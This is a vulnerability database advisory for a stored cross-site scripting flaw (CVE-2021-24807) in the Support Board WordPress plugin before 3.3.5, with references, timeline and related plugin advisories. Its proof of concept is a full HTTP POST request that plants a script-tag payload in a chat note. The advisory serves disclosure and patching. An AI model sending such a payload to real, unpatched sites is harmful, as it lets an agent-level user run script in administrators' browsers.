Support Board < 3.3.5 – Agent+ Stored Cross-Site Scripting | CVE 2021-24807 | Plugin Vulnerabilities

Description

The plugin allows Authenticated (Agent+) users to perform Cross-Site Scripting attacks by placing a payload in the notes field, when an administrator or any authenticated user go to the chat the XSS will be automatically executed.

Proof of Concept

POST /supportboard/include/ajax.php HTTP/1.1
Cookie: [Agent+]
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 808
X-Requested-With: XMLHttpRequest
Connection: close

function=add-note&conversation_id=476&user_id=2&name=Robert+Smith&message=%3CScRiPt%3Ealert(/XSS/)%3C%2FsCriPt%3E&login-cookie=<cookie>&language=false

Affects Plugins

Fixed in 3.3.5

References

CVE

URL

https://medium.com/@lijohnjefferson/cve-2021-24807-6bc22af2a444

URL

https://github.com/itsjeffersonli/CVE-2021-24807

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

John Jefferson Li

Submitter

John Jefferson Li

Submitter website

https://wgcompanyhq.com/

Submitter twitter

Verified

Yes

WPVDB ID

19d101aa-4b60-4db4-a33b-86c826b288b0

Timeline

Publicly Published

2021-10-07 (about 4 years ago)

Added

2021-10-07 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2024-11-22

Title

Payments Plugin and Checkout Plugin for WooCommerce: Stripe, PayPal, Square, Authorize.net < 1.113.0 - Reflected Cross-Site Scripting

Published

2022-03-15

Title

Super Socializer < 7.13.30 - Reflected Cross-Site Scripting

Published

2024-07-31

Title

Element Pack - Addon for Elementor Page Builder WordPress Plugin < 7.9.1 - Authenticated(Contributor+) Stored Cross-Site Scripting via Wrapper Link URL

Published

2014-08-01

Title

Count Per Day 3.1.1 - userperspan.php Multiple Parameter XSS

Published

2016-07-20

Title

Lazy Load <= 0.6 - Cross-Site Scripting (XSS)